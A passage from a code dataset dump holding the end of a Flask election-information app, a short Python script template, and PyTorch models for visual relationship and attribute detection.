\"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_state.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_state.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\t\t\telse:\n\t\t\t\tcontest_office_local.append(contest['office'])\n\t\t\t\tfor c in contest['candidates']:\n\t\t\t\t\tif c['party'] == 'Democratic Party':\n\t\t\t\t\t\tpartyColor = 'blue'\n\t\t\t\t\telif c['party'] == 'Republican Party':\n\t\t\t\t\t\tpartyColor = 'red'\n\t\t\t\t\telse:\n\t\t\t\t\t\tpartyColor = 'grey'\n\n\t\t\t\t\tsplitName = c['name'].split();\n\t\t\t\t\tformattedName = splitName[0] + \"%20\" + splitName[1]\n\t\t\t\t\timgRequest = requests.get(\"https://en.wikipedia.org/w/api.php?action=query&titles=\" + formattedName + \"&format=json&prop=pageimages&formatversion=2\")\n\t\t\t\t\timgData = imgRequest.json()\n\t\t\t\t\tif 'thumbnail' in imgData['query']['pages'][0]:\n\t\t\t\t\t\timgUrl = imgData['query']['pages'][0]['thumbnail']['source']\n\t\t\t\t\t\tcontest_candidates_local.append({'name': c['name'], 'office': contest['office'], 'imgUrl': imgUrl, 'partyColor': partyColor})\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontest_candidates_local.append({'name': c['name'], 'office': contest['office'], 'imgUrl': 'https://freeiconshop.com/wp-content/uploads/edd/person-solid.png', 'partyColor': partyColor})\n\n\tfor place in polling_places:\n\t\tpolling_places_list.append({'name': place['address']['locationName'], 'street_address': place['address']['line1'], 'city': place['address']['city'], 'state': place['address']['state'], 'zip': place['address']['zip']})\n\n\tfor site in early_vote_sites:\n\t\tearly_vote_sites_list.append({'name': site['address']['locationName'], 'street_address': site['address']['line1'], 'city': site['address']['city'], 'state': site['address']['state'], 'zip': site['address']['zip']})\n\n\n\ttemplateData = {\n\t\t\t'screen_name' : '{} last 10 tweets'.format(screen_name),\n\t\t\t'user_tweets' : tlist,\n\t\t\t'pred' : pred,\n\t\t\t'election': election,\n\t\t\t'contest_type' : contest_type,\n\t\t\t'contest_office_federal' : contest_office_federal,\n\t\t\t'contest_office_state' : contest_office_state,\n\t\t\t'contest_office_local' : contest_office_local,\n\t\t\t'contest_candidates_federal' : contest_candidates_federal,\n\t\t\t'contest_candidates_state' : contest_candidates_state,\n\t\t\t'contest_candidates_local' : contest_candidates_local,\n\t\t\t'polling_places_list' : polling_places_list,\n\t\t\t'early_vote_sites_list' : early_vote_sites_list\n\t\t}\n\n\treturn flask.render_template(\"result.html\", **templateData)\n\n@app.route('/')\n\ndef main():\n\treturn flask.render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tapp.debug=True\n\tapp.run()\n","sub_path":"New folder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"613339321","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntemplate.py\nbla bla\n\nPatrick Simianer \nYYYY-MM-DD\n\"\"\"\n\nimport sys\n\n\ndef main():\n    try:\n        arg = sys.argv[1]\n    except IndexError:\n        sys.stderr.write('Usage: %s 
\\n'%sys.argv[0])\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379410456","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport itertools\n\nimport numpy as np\nfrom torchvision.models.detection.transform import GeneralizedRCNNTransform\nfrom models.focal_loss import FocalLoss\n\nimport pdb\n\n\nclass RelationshipsModelBase(nn.Module):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__()\n\n self.num_relationships = dataset.num_relationships()\n self.num_classes = dataset.num_classes()\n self.rel_context = rel_context\n self.use_labels = use_labels\n print('Use labels: {}'.format(use_labels))\n\n self.rel_class_loss_fn = nn.CrossEntropyLoss(ignore_index=0) # standard classification problem\n # self.rel_relationshipness_loss_fn = FocalLoss()\n self.rel_relationshipness_loss_fn = nn.BCEWithLogitsLoss()\n # self.rel_loss_fn = FocalLoss(num_classes=self.num_relationships, reduction='sum')\n self.cuda_on = False\n\n def bbox_union(self, boxes_perm, padding=0):\n x1, _ = torch.min(boxes_perm[:, :, [0, 4]], dim=2)\n y1, _ = torch.min(boxes_perm[:, :, [1, 5]], dim=2)\n x2, _ = torch.max(boxes_perm[:, :, [2, 6]], dim=2)\n y2, _ = torch.max(boxes_perm[:, :, [3, 7]], dim=2)\n # w = max(box1[0] + box1[2], box2[0] + box2[2]) - x\n # h = max(box1[1] + box1[3], box2[1] + box2[3]) - y\n out_box = torch.stack([x1 - padding, y1 - padding, x2 + padding, y2 + padding], dim=2)\n return out_box\n\n def spatial_features(self, boxes_perm):\n deltax = (boxes_perm[:, :, 0] - boxes_perm[:, :, 4]) / (boxes_perm[:, :, 6] - boxes_perm[:, :, 4])\n deltay = (boxes_perm[:, :, 1] - boxes_perm[:, :, 5]) / (boxes_perm[:, :, 7] - boxes_perm[:, :, 5])\n logw = torch.log((boxes_perm[:, :, 2] - boxes_perm[:, :, 0]) / (boxes_perm[:, :, 6] - boxes_perm[:, :, 4]))\n logh = torch.log((boxes_perm[:, :, 3] - boxes_perm[:, :, 1]) / (boxes_perm[:, :, 7] - boxes_perm[:, :, 5]))\n area1 = (boxes_perm[:, :, 2] - boxes_perm[:, :, 0]) * (boxes_perm[:, :, 3] - boxes_perm[:, :, 1])\n area2 = (boxes_perm[:, :, 6] - boxes_perm[:, :, 4]) * (boxes_perm[:, :, 7] - boxes_perm[:, :, 5])\n\n res = torch.stack([deltax, deltay, logw, logh, area1, area2], dim=2)\n return res\n\n def choose_rel_indexes(self, relationships):\n # get annotated relationships and their opposite (dog is under the table and table is NOT under the dog)\n a = relationships > 0\n #b = torch.transpose(a, 0, 1)\n chosen = a # + b\n\n # add some null random relationship to the set (30%)\n rand_matrix = torch.rand_like(relationships, dtype=torch.float)\n #c = rand_matrix < 0.3\n #chosen += c\n\n # add a random amount of null relationships\n rand_values = torch.randint(0, relationships.shape[0] ** 2, size=(torch.nonzero(relationships).shape[0],))\n d = torch.zeros_like(relationships)\n d = d.view(-1)\n d[rand_values] = 1\n d = d.view(relationships.shape[0], relationships.shape[1])\n chosen += d.byte()\n\n # make sure the diagonal is 0 (there are no relationships between an object and itself)\n '''not_diagonal = 1 - torch.eye(relationships.size(0))\n not_diagonal = not_diagonal.byte()\n if self.cuda_on:\n not_diagonal = not_diagonal.cuda()\n chosen = chosen * not_diagonal'''\n\n # at least one value should be 1 in order to avoid that the whole matrix is 0 (floating point exception happens)\n 
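A concrete check of the pair geometry that bbox_union() above works on: the K x K x 8 tensor stacks every (subject, object) box pair, and the column-wise min/max yields the enclosing box. Toy coordinates, with the padding step omitted:

import torch

boxes = torch.tensor([[0., 0., 10., 10.],
                      [5., 5., 20., 15.]])
obj = boxes.unsqueeze(0).repeat(2, 1, 1)   # obj[i, j]  == boxes[j]
subj = boxes.unsqueeze(1).repeat(1, 2, 1)  # subj[i, j] == boxes[i]
pairs = torch.cat((obj, subj), dim=2)      # K x K x 8, as built in forward() below
x1 = torch.min(pairs[:, :, [0, 4]], dim=2).values
y1 = torch.min(pairs[:, :, [1, 5]], dim=2).values
x2 = torch.max(pairs[:, :, [2, 6]], dim=2).values
y2 = torch.max(pairs[:, :, [3, 7]], dim=2).values
print(torch.stack([x1, y1, x2, y2], dim=2)[0, 1])  # tensor([ 0.,  0., 20., 15.])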
if torch.nonzero(relationships).shape[0] == 0:\n rawind = torch.argmax(rand_matrix)\n chosen[rawind // relationships.size(0), rawind % relationships.size(1)] = 1\n # print('WARNING! Images with zero relationships should not be here now.')\n\n return chosen > 0\n\n def forward(self, boxes, labels, targets, img_features, pooled_regions, img_shape, scale):\n # Infer the relationships between objects\n\n # Pseudo-code:\n # for every couple:\n # compute the union bounding box\n # pool this region in order to extract features\n # concat subj+label, rel, obj+label features\n # pass through the relationships classifier\n\n # 0. Compute the union bounding box and the spatial features\n obj_perm = boxes.unsqueeze(0).repeat(boxes.size(0), 1, 1) # K x K x 4\n subj_perm = boxes.unsqueeze(1).repeat(1, boxes.size(0), 1) # K x K x 4\n box1box2_perm = torch.cat((obj_perm, subj_perm), dim=2) # K x K x 8\n relboxes = self.bbox_union(box1box2_perm, padding=10) # K x K x 4\n box1relboxes_perm = torch.cat((obj_perm, relboxes), dim=2) # K x K x 8\n relboxesbox2_perm = torch.cat((relboxes, subj_perm), dim=2) # K x K x 8\n\n box1box2_perm_feats = self.spatial_features(box1box2_perm) # K x K x 4\n so_feats = box1box2_perm_feats[:, :, :-2] # K x K x 2, exclude areas\n area_boxes_over_img = box1box2_perm_feats[:, :, -2:] / (\n img_shape[0] * img_shape[1]) # take only the areas and normalize with respect to frame\n sp_feats = self.spatial_features(box1relboxes_perm)[:, :, :-2] # K x K x 4\n po_feats = self.spatial_features(relboxesbox2_perm)[:, :, :-2] # K x K x 4\n\n spatial_features = torch.cat([so_feats, sp_feats, po_feats, area_boxes_over_img], dim=2)\n\n # 1. Compute the union bounding box, only if rel_context is not None\n if self.rel_context == 'relation_box':\n # 2. Pool all the regions\n relboxes = relboxes.view(-1, 4)\n pooled_rel_regions = torchvision.ops.roi_align(img_features.unsqueeze(0), [relboxes], output_size=(4, 4),\n spatial_scale=scale) # K*K x 256 x 4 x 4\n # Prepare the relationship features for the concatenation\n pooled_rel_regions = pooled_rel_regions.view(boxes.size(0), boxes.size(0),\n pooled_rel_regions.size(1),\n pooled_rel_regions.size(2),\n pooled_rel_regions.size(3)) # K x K x 256 x 4 x 4\n elif self.rel_context == 'whole_image':\n raise NotImplementedError()\n # self.avgpool(img_features)\n # TODO!\n elif self.rel_context == 'image_level_labels':\n raise NotImplementedError()\n # TODO!\n else:\n pooled_rel_regions = None\n\n # Stack the subject and object features\n pooled_obj_regions = pooled_regions.unsqueeze(0).repeat(boxes.size(0), 1, 1, 1, 1) # K x K x 256 x 4 x 4\n pooled_subj_regions = pooled_regions.unsqueeze(1).repeat(1, boxes.size(0), 1, 1, 1) # K x K x 256 x 4 x 4\n pooled_subj_obj_regions = torch.cat((pooled_subj_regions, pooled_obj_regions), dim=2) # K x K x 512 x 4 x 4\n\n if self.use_labels:\n # Handle labels\n one_hot_obj_label = nn.functional.one_hot(labels, self.num_classes).float().unsqueeze(0).repeat(boxes.size(0),\n 1,\n 1) # K x K x num_classes\n one_hot_subj_label = nn.functional.one_hot(labels, self.num_classes).float().unsqueeze(1).repeat(1,\n boxes.size(0),\n 1) # K x K x num_classes\n one_hot_subj_obj_label = torch.cat((one_hot_subj_label, one_hot_obj_label), dim=2)\n else:\n one_hot_subj_obj_label = None\n\n if self.training:\n # If training, we suppress some of the relationships\n # Hence, calculate a filter in order to control the amount of relations and non-relations seen by the architecture.\n choosen_relation_indexes = 
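choose_rel_indexes() above draws as many random null pairs as there are annotated ones by scattering ones into the flattened K x K relationship matrix and folding it back. The sampling trick in isolation, on a toy 2 x 2 matrix:

import torch

rels = torch.tensor([[0, 3], [0, 0]])           # one annotated relationship
n_pos = torch.nonzero(rels).shape[0]
idx = torch.randint(0, rels.numel(), (n_pos,))  # as many sampled cells as positives
neg = torch.zeros_like(rels).view(-1)
neg[idx] = 1
chosen = (rels > 0) | (neg.view_as(rels) > 0)   # positives plus sampled null pairs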
self.choose_rel_indexes(targets['relationships'])\n        else:\n            choosen_relation_indexes = None\n\n        # 4. Run the Relationship classifier\n        rel_out = self.features_to_relationships(pooled_subj_obj_regions, spatial_features,\n                                                 one_hot_subj_obj_label, pooled_rel_regions,\n                                                 choosen_relation_indexes)\n        if self.training:\n            t = targets['relationships'][choosen_relation_indexes]\n            rel_class_loss = self.rel_class_loss_fn(rel_out, t)\n            rel_relationshipness_loss = self.rel_relationshipness_loss_fn(rel_out[:, 0], (t > 0).float())\n\n            return rel_class_loss, rel_relationshipness_loss\n        else:\n            inferred_rels = F.softmax(rel_out[:, 1:], dim=1)\n            _, rels_indexes = torch.max(inferred_rels, dim=1)\n            rels_scores = torch.sigmoid(rel_out[:, 0]) # the relationshipness is considered as score\n\n            # reshape back to a square matrix\n            rels_scores = rels_scores.view(boxes.size(0), boxes.size(0))\n            # put diagonal scores manually to 0 (object are not related to theirselves)\n            mask = 1 - torch.eye(boxes.size(0))\n            if self.cuda_on:\n                mask = mask.cuda()\n            rels_scores *= mask\n\n            rels_indexes = rels_indexes.view(boxes.size(0), boxes.size(0))\n            rels_indexes += 1 # since the index 0 is the null relationship\n\n            return {'relationships': rels_indexes, 'relationships_scores': rels_scores}\n\n    def features_to_relationships(self, pooled_subj_obj_regions, spatial_features,\n                                  one_hot_subj_obj_label, pooled_rel_regions,\n                                  choosen_relation_indexes):\n        # Should be overridden by the extending classes\n        raise NotImplementedError()\n\n    def cuda(self, device=None):\n        self.cuda_on = True\n        return super().cuda(device)\n\n\nclass RelationshipsModelsSingleNet(RelationshipsModelBase):\n    def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n        super().__init__(dataset, rel_context, use_labels)\n        if rel_context == 'relation_box':\n            input_size = 4 * 4 * 256 * 3 + 2 * self.num_classes * use_labels\n        elif rel_context == 'whole_image':\n            input_size = 4 * 4 * 256 * 3 + 2 * self.num_classes * use_labels\n        elif rel_context == 'image_level_labels':\n            input_size = 4 * 4 * 256 * 2 + 3 * self.num_classes * use_labels\n        elif rel_context is None:\n            input_size = 4 * 4 * 256 * 2 + 2 * self.num_classes * use_labels\n        # add spatial feature\n        input_size += 14\n        self.relationships_classifier = nn.Sequential(\n            nn.Linear(input_size, 4096),\n            nn.ReLU(),\n            nn.Dropout(),\n            nn.Linear(4096, 4096),\n            nn.ReLU(),\n            nn.Dropout(),\n            nn.Linear(4096, self.num_relationships),\n        )\n\n    def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n                                  pooled_rel_regions, choosen_idxs):\n        # Prepare object features for concatenation\n        pooled_subj_obj_regions = pooled_subj_obj_regions.view(pooled_subj_obj_regions.size(0), pooled_subj_obj_regions.size(1), -1) # K x K x 512*4*4\n\n        # Concatenate object regions and spatial features\n        pooled_concat = torch.cat((pooled_subj_obj_regions, spatial_features), dim=2)\n\n        # If needed, concatenate object labels\n        if self.use_labels:\n            pooled_concat = torch.cat((pooled_concat, one_hot_subj_obj_label), dim=2)\n\n        # If needed, concatenate the feature regarding the relationship context\n        if self.rel_context is not None:\n            # First, prepare the relationship features for the concatenation\n            pooled_rel_regions = pooled_rel_regions.view(pooled_rel_regions.size(0), pooled_rel_regions.size(0), -1) # K x K x 256*4*4\n            pooled_concat = torch.cat((pooled_concat, pooled_rel_regions), dim=2)\n\n        if self.training:\n            # If training, we suppress some of the relationships\n            # Hence, calculate a filter in order to control the amount of 
relations and non-relations seen by the architecture.\n pooled_concat = pooled_concat[choosen_idxs]\n else:\n # Reshape for passing through the classifier\n pooled_concat = pooled_concat.view(pooled_concat.size(0) ** 2, -1)\n\n # 4. Run the Relationship classifier\n rel_out = self.relationships_classifier(pooled_concat)\n return rel_out\n\n\nclass RelationshipsModelsMultipleNets(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Conv2d(512, 1024, 2, stride=1),\n nn.BatchNorm2d(1024),\n nn.ReLU(),\n nn.Conv2d(1024, 1024, 1),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n elif rel_context is None:\n self.context_net = None\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n if use_labels:\n self.labels_net = nn.Sequential(\n nn.Linear(2 * self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n # final classifier\n input = 256 + 512*4 * 2 # spatial features + objects\n if use_labels:\n input += 256\n if rel_context == 'relation_box' or rel_context == 'whole_image':\n input += 1024*4\n self.final_classifier = nn.Sequential(\n nn.Linear(input, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_relationships),\n )\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n p_spatial = self.spatial_net(spatial_features)\n\n p_subj = self.objects_convnet(pooled_subj_obj_regions[:, :256, :, :])\n p_subj = p_subj.view(p_subj.size(0), -1) # flatten\n\n p_obj = self.objects_convnet(pooled_subj_obj_regions[:, 256:, :, :])\n p_obj = p_obj.view(p_obj.size(0), -1) # flatten\n\n concat = torch.cat((p_subj, p_obj, p_spatial), dim=1)\n if self.use_labels:\n # Forward the label net\n p_labels = self.labels_net(one_hot_subj_obj_label)\n concat = torch.cat((concat, p_labels), dim=1)\n\n if 
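The 512*4 term in the classifier input size above falls out of objects_convnet: a 2x2 convolution with stride 2 over the 4x4 pooled region leaves a 2x2 map with 512 channels, i.e. 512 * 2 * 2 = 2048 features per object once flattened. A quick shape check:

import torch
import torch.nn as nn

conv = nn.Sequential(nn.Conv2d(256, 512, 2, stride=2), nn.BatchNorm2d(512), nn.ReLU())
out = conv(torch.randn(1, 256, 4, 4))
print(out.shape)             # torch.Size([1, 512, 2, 2])
print(out.flatten(1).shape)  # torch.Size([1, 2048]) == 512 * 4 features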
self.rel_context is not None:\n # Forward the context network\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.view(p_context.size(0), -1)\n concat = torch.cat((concat, p_context), dim=1)\n\n rel_out = self.final_classifier(concat)\n return rel_out\n\n\nclass RelationshipsModelSumOfProbabilities(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Conv2d(512, 512, 2, stride=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n elif rel_context is None:\n self.context_net = None\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, self.num_relationships)\n )\n\n if use_labels:\n self.labels_net = nn.Sequential(\n nn.Linear(2 * self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, self.num_relationships)\n )\n\n self.visual_objects_classifier = nn.Sequential(\n nn.Linear(256 * 4, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, self.num_relationships)\n )\n\n self.visual_relationships_classifier = nn.Sequential(\n nn.Linear(256 * 4 * 2 + 512 * 4, 2048),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(2048, 2048),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(2048, self.num_relationships)\n )\n\n # final classifier\n '''input = 256 + 1024 # spatial features + objects\n if use_labels:\n input += 256\n if rel_context == 'relation_box' or rel_context == 'whole_image':\n input += 512\n self.final_classifier = nn.Sequential(\n nn.Linear(input, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_relationships),\n )'''\n\n def features_to_relationships(self, pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n if self.use_labels:\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n if self.rel_context is not None:\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n class_spatial = self.spatial_net(spatial_features)\n\n p_subj = F.avg_pool2d(pooled_subj_obj_regions[:, :256, :, :], 2, stride=2)\n p_subj = p_subj.view(p_subj.size(0), -1) # flatten\n\n p_obj = 
F.avg_pool2d(pooled_subj_obj_regions[:, 256:, :, :], 2, stride=2)\n p_obj = p_obj.view(p_obj.size(0), -1) # flatten\n\n class_subj = self.visual_objects_classifier(p_subj)\n class_obj = self.visual_objects_classifier(p_obj)\n\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.view(p_context.size(0), -1) # flatten\n\n concat = torch.cat((p_subj, p_obj, p_context), dim=1)\n class_rel = self.visual_relationships_classifier(concat)\n\n class_labels = self.labels_net(one_hot_subj_obj_label)\n\n final = torch.stack((class_subj, class_obj, class_rel, class_labels, class_spatial), dim=0).sum(dim=0)\n return final\n\n\nclass DRNet(nn.Module):\n def __init__(self, obj_feats, rel_feats, num_rels, num_objs, iters=5):\n super().__init__()\n self.w_a = nn.Linear(obj_feats, num_objs)\n self.w_r = nn.Linear(rel_feats, num_rels)\n\n self.w_sr = nn.Linear(num_rels, num_objs)\n self.w_so = nn.Linear(num_objs, num_objs)\n\n self.w_rs = nn.Linear(num_objs, num_rels)\n self.w_ro = nn.Linear(num_objs, num_rels)\n\n self.w_os = nn.Linear(num_objs, num_objs)\n self.w_or = nn.Linear(num_rels, num_objs)\n\n self.num_rels = num_rels\n self.num_objs = num_objs\n self.iters = iters\n self.cuda_on = False\n\n def forward(self, xs, xo, xr):\n qs = torch.zeros((xs.shape[0], self.num_objs), requires_grad=True)\n qo = torch.zeros((xo.shape[0], self.num_objs), requires_grad=True)\n qr = torch.zeros((xr.shape[0], self.num_rels), requires_grad=True)\n if self.cuda_on:\n qs, qo, qr = qs.cuda(), qo.cuda(), qr.cuda()\n for i in range(self.iters):\n qs_out = torch.stack((self.w_a(xs), self.w_sr(qr), self.w_so(qo)), dim=0).sum(dim=0)\n qr_out = torch.stack((self.w_r(xr), self.w_rs(qs), self.w_ro(qo)), dim=0).sum(dim=0)\n qo_out = torch.stack((self.w_a(xo), self.w_os(qs), self.w_or(qr)), dim=0).sum(dim=0)\n qs = F.relu(qs_out)\n if i != self.iters - 1:\n qr = F.relu(qr_out)\n else:\n qr = qr_out\n qo = F.relu(qo_out)\n\n return qr\n\n def cuda(self, device=None):\n self.cuda_on = True\n return super().cuda(device)\n\n\nclass RelationshipsModelDRNet(RelationshipsModelBase):\n def __init__(self, dataset, rel_context='relation_box', use_labels=False):\n super().__init__(dataset, rel_context, use_labels)\n\n assert rel_context is not None, \"Relation context is needed in DRNet\"\n if rel_context == 'relation_box':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'whole_image':\n self.context_net = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n elif rel_context == 'image_level_labels':\n raise NotImplementedError\n\n self.spatial_net = nn.Sequential(\n nn.Linear(14, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_labels_net = nn.Sequential(\n nn.Linear(self.num_classes + 512, 1024),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n )\n\n self.context_spatial_net = nn.Sequential(\n nn.Linear(256 + 512, 1024),\n nn.ReLU(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n )\n\n #self.obj_project = nn.Linear(1024, self.num_classes)\n #self.rel_project = nn.Linear(1024, self.num_relationships)\n self.dr_net = DRNet(obj_feats=1024, rel_feats=1024, num_rels=self.num_relationships, num_objs=self.num_classes)\n\n def features_to_relationships(self, 
pooled_subj_obj_regions, spatial_features, one_hot_subj_obj_label,\n pooled_rel_regions, choosen_idxs):\n if self.training:\n # Filter training examples\n\n pooled_subj_obj_regions = pooled_subj_obj_regions[choosen_idxs]\n spatial_features = spatial_features[choosen_idxs]\n one_hot_subj_obj_label = one_hot_subj_obj_label[choosen_idxs]\n pooled_rel_regions = pooled_rel_regions[choosen_idxs]\n else:\n # Reshape these tensors in order to pass through the net\n pooled_subj_obj_regions = pooled_subj_obj_regions.view(-1, pooled_subj_obj_regions.size(2),\n pooled_subj_obj_regions.size(3),\n pooled_subj_obj_regions.size(4))\n spatial_features = spatial_features.view(-1, spatial_features.size(2))\n one_hot_subj_obj_label = one_hot_subj_obj_label.view(-1, one_hot_subj_obj_label.size(2))\n pooled_rel_regions = pooled_rel_regions.view(-1, pooled_rel_regions.size(2),\n pooled_rel_regions.size(3),\n pooled_rel_regions.size(4))\n\n # Forward through the net\n\n p_subj = self.objects_convnet(pooled_subj_obj_regions[:, :256, :, :])\n p_subj = p_subj.mean(dim=(2, 3)) # global average pooling\n p_subj = torch.cat((p_subj, one_hot_subj_obj_label[:, :self.num_classes]), dim=1)\n\n p_obj = self.objects_convnet(pooled_subj_obj_regions[:, 256:, :, :])\n p_obj = p_obj.mean(dim=(2, 3)) # global average pooling\n p_obj = torch.cat((p_obj, one_hot_subj_obj_label[:, self.num_classes:]), dim=1)\n\n # Prepare the aggregated features (spatial - context for relationships and visual - label for objects)\n p_context = self.context_net(pooled_rel_regions)\n p_context = p_context.mean(dim=(2, 3))\n p_spatial = self.spatial_net(spatial_features)\n\n p_rel = torch.cat((p_context, p_spatial), dim=1)\n p_rel = self.context_spatial_net(p_rel)\n p_obj = self.objects_labels_net(p_obj)\n p_subj = self.objects_labels_net(p_subj)\n\n # Forward the DRNet\n #p_obj = F.softmax(self.obj_project(p_obj), dim=1)\n #p_subj = F.softmax(self.obj_project(p_subj), dim=1)\n #p_rel = F.softmax(self.rel_project(p_rel), dim=1)\n rel_out = self.dr_net(p_subj, p_obj, p_rel)\n\n return rel_out\n\n def cuda(self, device=None):\n self.dr_net.cuda()\n return super().cuda(device)\n\n\nclass AttributesModelBase(nn.Module):\n def __init__(self, dataset):\n super().__init__()\n self.num_attributes = dataset.num_attributes()\n self.num_classes = dataset.num_classes()\n self.attr_loss_fn = nn.MultiLabelSoftMarginLoss() # multi-label classification problem\n self.avgpool = nn.AdaptiveAvgPool2d((4, 4))\n\n def forward(self, boxes, labels, targets, img_features, pooled_regions):\n # Infer the attributes for every object in the images\n\n one_hot_label = nn.functional.one_hot(labels, self.num_classes)\n\n # 2. 
